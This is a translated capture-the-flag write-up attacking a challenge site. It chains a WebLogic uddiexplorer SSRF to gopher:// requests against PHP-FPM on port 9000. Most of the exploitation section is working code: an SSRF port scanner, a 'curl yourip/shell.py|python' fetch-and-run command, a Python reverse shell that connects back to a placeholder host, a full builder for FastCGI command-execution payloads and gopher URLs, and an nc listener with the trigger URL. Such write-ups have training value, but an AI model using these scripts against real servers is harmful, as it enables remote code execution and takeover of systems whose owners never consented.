Three White Hats - Looking for You Who Came from the Stars - Issue 1
Challenge Introduction
You, lost from the stars: I may need to use everything I have to get you back. I cannot make up any more sentences, so OK, I admit it: this is a penetration challenge, as direct as that.
Challenge goals
http://0761e975dda0c67cb.jie.sangebaimao.com/
0X01 Information Collection
Open the address: it is a Discuz (DZ) forum. It does not look promising, since it is the latest version.
Since this is penetration testing, bring out the killer move: directory scanning! (The wordlist is the key.)
Two key paths turn up quickly (ignoring Discuz's own directories and pages):
/info.php
/uddiexplorer/
The first is a phpinfo() page, very useful: among other things it reveals the script's location on disk,
/opt/discuz/info.php
The second is WebLogic.
Search Baidu for "uddiexplorer vulnerability" and you learn at once that WebLogic's uddiexplorer has an SSRF vulnerability.
The key to this penetration is SSRF!!!
0X02 Exploiting the Vulnerability
SSRF is not only about reaching other hosts on the internal network; here the target is the Three White Hats Docker container itself, so we point it at 127.0.0.1!
Baidu it: search for "SearchPublicRegistries SSRF vulnerability exp" and you get
http://www.tuicool.com/articles/UJAQIBZ
Grab the script, adapt it, and go!!!
port_scan.py
```python
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# SSRF port scan through WebLogic's uddiexplorer: the error text in the response
# leaks whether 127.0.0.1:<port> accepted the connection.
import re
import requests


def scan(ip_str):
    url = 'http://0761e975dda0c67cb.jie.sangebaimao.com'
    ports = ('21', '22', '23', '53', '80', '1080', '1433', '1521', '3306',
             '3389', '4899', '8080', '7001', '8000', '9000', '9001')
    path = ('/uddiexplorer/SearchPublicRegistries.jsp?operator=http://%s:%s'
            '&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor='
            '&selfor=Business+location&btnSubmit=Search')
    for port in ports:
        exp_url = url + path % (ip_str, port)
        try:
            response = requests.get(exp_url, timeout=15, verify=False)
            # Open port: WebLogic connects, receives a non-SOAP reply and reports
            # XML_SoapException. Closed port: "... but could not connect".
            re_sult1 = re.findall('weblogic.uddi.client.structures.exception.XML_SoapException', response.text)
            re_sult2 = re.findall('but could not connect', response.text)
            if len(re_sult1) != 0 and len(re_sult2) == 0:
                print(ip_str + ':' + port)
        except Exception:
            pass


if __name__ == "__main__":
    scan('127.0.0.1')
```
This successfully finds ports 22, 80, 3306, 7001 and 9000 (among others) open.
SSRF + gopher has always been a strong combination, and lately it is a hot topic.
Back to Baidu ~~
The latest article by RR: "Do Evil Things with gopher://"
0X03 Attack FastCGI
Normally FastCGI is bound to 127.0.0.1 only (port 9000 here, which the scan above found open), so it is unreachable from outside, but gopher:// through the SSRF lets us speak raw FastCGI to it and attacking FastCGI gives arbitrary command execution. The attack needs the path of an existing PHP file on disk, which is exactly what the phpinfo() page gave us: /opt/discuz/info.php.
0X06 Reference: remote command execution via PHP FastCGI
Download fcgi_exp.
Run:
```shell
nc -l -p 9000 > x.txt &
go run fcgi_exp.go system 127.0.0.1 9000 /opt/discuz/info.php "curl yourip/shell.py|python"
php -f gopher.php
```
The nc listener plays the part of PHP-FPM on local port 9000, so the raw FastCGI request that fcgi_exp.go would have sent is captured instead: this saves the payload to x.txt.
Reverse shell black magic: a bash reverse shell does not work here ~~ so the command pulls a Python one instead.
Then URL-encode the payload and generate ssrf.php.
shell.py
```python
import socket, subprocess, os
# Python reverse shell: connect back to the VPS and wire stdin/stdout/stderr
# of an interactive bash to the socket.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("yourip", 9999))
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
p = subprocess.call(["/bin/bash", "-i"])
```
gopher.php (URL-encodes x.txt into a gopher:// payload and writes it out as ssrf.php; only the closing `");?>` of the script is reproduced here).
This successfully generates the exploit file ssrf.php.
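To make the fcgi_exp / gopher.php step reproducible without the Go tool, here is an added example (my code, not the writeup's nor fcgi_exp's) that builds the same kind of FastCGI request stream fcgi_exp.go writes into x.txt, percent-encodes it into the gopher:// URL, and emits the redirect page hosted as ssrf.php. It assumes the standard fcgi_exp technique (PHP_VALUE auto_prepend_file=php://input plus PHP_ADMIN_VALUE allow_url_include=On, with the PHP code sent as FCGI_STDIN), and it assumes that gopher.php produced a `header("Location: gopher://...")` stub, which is consistent with the surviving `");?>` but is not confirmed by the page. The `yourip` placeholder is the writeup's own.

```python
#!/usr/bin/env python3
"""Build a FastCGI request that makes PHP-FPM run a command, then wrap it as a
gopher:// URL for the WebLogic SSRF.  Added example; a stand-in for fcgi_exp.go
and gopher.php, not the original tools."""
import struct

FCGI_VERSION = 1
FCGI_BEGIN_REQUEST, FCGI_PARAMS, FCGI_STDIN = 1, 4, 5
FCGI_RESPONDER = 1


def fcgi_record(rtype, content, request_id=1):
    """One FastCGI record: 8-byte header, content, padding to an 8-byte boundary."""
    padding = (8 - len(content) % 8) % 8
    header = struct.pack(">BBHHBx", FCGI_VERSION, rtype, request_id, len(content), padding)
    return header + content + b"\x00" * padding


def fcgi_name_value(name, value):
    """Name-value pair: 1-byte length if < 128, else 4 bytes with the high bit set."""
    def enc_len(n):
        return bytes([n]) if n < 128 else struct.pack(">I", n | 0x80000000)
    return enc_len(len(name)) + enc_len(len(value)) + name + value


def php_escape(command):
    """Escape for a PHP single-quoted string (only \\ and ' are special there)."""
    return command.replace("\\", "\\\\").replace("'", "\\'")


def build_fastcgi_request(script, command):
    """BEGIN_REQUEST, PARAMS (+ empty terminator), STDIN (+ empty terminator)."""
    code = "<?php system('%s'); die(); ?>" % php_escape(command)
    params = [
        ("GATEWAY_INTERFACE", "FastCGI/1.0"),
        ("REQUEST_METHOD", "POST"),
        ("SCRIPT_FILENAME", script),   # must exist on disk: /opt/discuz/info.php from phpinfo()
        ("SCRIPT_NAME", script),
        ("REQUEST_URI", script),
        ("DOCUMENT_ROOT", "/"),
        ("SERVER_SOFTWARE", "php/fcgiclient"),
        ("REMOTE_ADDR", "127.0.0.1"),
        ("REMOTE_PORT", "9985"),
        ("SERVER_ADDR", "127.0.0.1"),
        ("SERVER_PORT", "80"),
        ("SERVER_NAME", "localhost"),
        ("SERVER_PROTOCOL", "HTTP/1.1"),
        ("CONTENT_TYPE", "application/text"),
        ("CONTENT_LENGTH", str(len(code))),
        # The two overrides that turn a reachable PHP-FPM socket into RCE: prepend
        # php://input (our FCGI_STDIN body) to the script and allow URL includes.
        ("PHP_VALUE", "auto_prepend_file = php://input"),
        ("PHP_ADMIN_VALUE", "allow_url_include = On"),
    ]
    begin = fcgi_record(FCGI_BEGIN_REQUEST, struct.pack(">HB5x", FCGI_RESPONDER, 0))
    param_bytes = b"".join(fcgi_name_value(k.encode(), v.encode()) for k, v in params)
    return (begin
            + fcgi_record(FCGI_PARAMS, param_bytes) + fcgi_record(FCGI_PARAMS, b"")
            + fcgi_record(FCGI_STDIN, code.encode()) + fcgi_record(FCGI_STDIN, b""))


def parse_records(data):
    """Walk a FastCGI byte stream and return [(type, content), ...]; use it to
    sanity-check x.txt before URL-encoding it."""
    out, pos = [], 0
    while pos < len(data):
        ver, rtype, _rid, clen, plen = struct.unpack(">BBHHBx", data[pos:pos + 8])
        assert ver == FCGI_VERSION
        out.append((rtype, data[pos + 8:pos + 8 + clen]))
        pos += 8 + clen + plen
    return out


def gopher_url(payload, host="127.0.0.1", port=9000):
    """gopher://host:port/_<bytes>: every byte percent-encoded; the leading '_' is
    the gopher item-type character, which the client strips, so the raw FastCGI
    stream reaches PHP-FPM unchanged."""
    return "gopher://%s:%d/_%s" % (host, port, "".join("%%%02X" % b for b in payload))


def redirect_stub(url):
    """The ssrf.php hosted on the VPS (assumed shape): WebLogic fetches it via the
    operator parameter, follows the 302, and the Location header carries gopher://."""
    return '<?php header("Location: %s");?>' % url


if __name__ == "__main__":
    req = build_fastcgi_request("/opt/discuz/info.php", "curl yourip/shell.py|python")
    url = gopher_url(req)
    print(len(req), "bytes ->", url[:60] + "...")
    print(redirect_stub(url))
```

Two checks worth doing before firing: run parse_records() on the bytes (or on a captured x.txt) and confirm the record sequence is BEGIN, PARAMS, empty PARAMS, STDIN, empty STDIN, and make sure SCRIPT_FILENAME points at a real .php file, because PHP-FPM answers "File not found" otherwise and the prepend never runs.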
Reverse shell
On the VPS, listen:
```shell
nc -lvv 9999
```
Trigger it through the SSRF (WebLogic fetches ssrf.php from the VPS and follows its redirect to the gopher:// payload):
http://0761e975dda0c67cb.jie.sangebaimao.com/uddiexplorer/SearchPublicRegistries.jsp?&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business%20location&btnSubmit=Search&operator=yourip/ssrf.php
Reverse shell received ~~~
Get the flag
Find it yourself.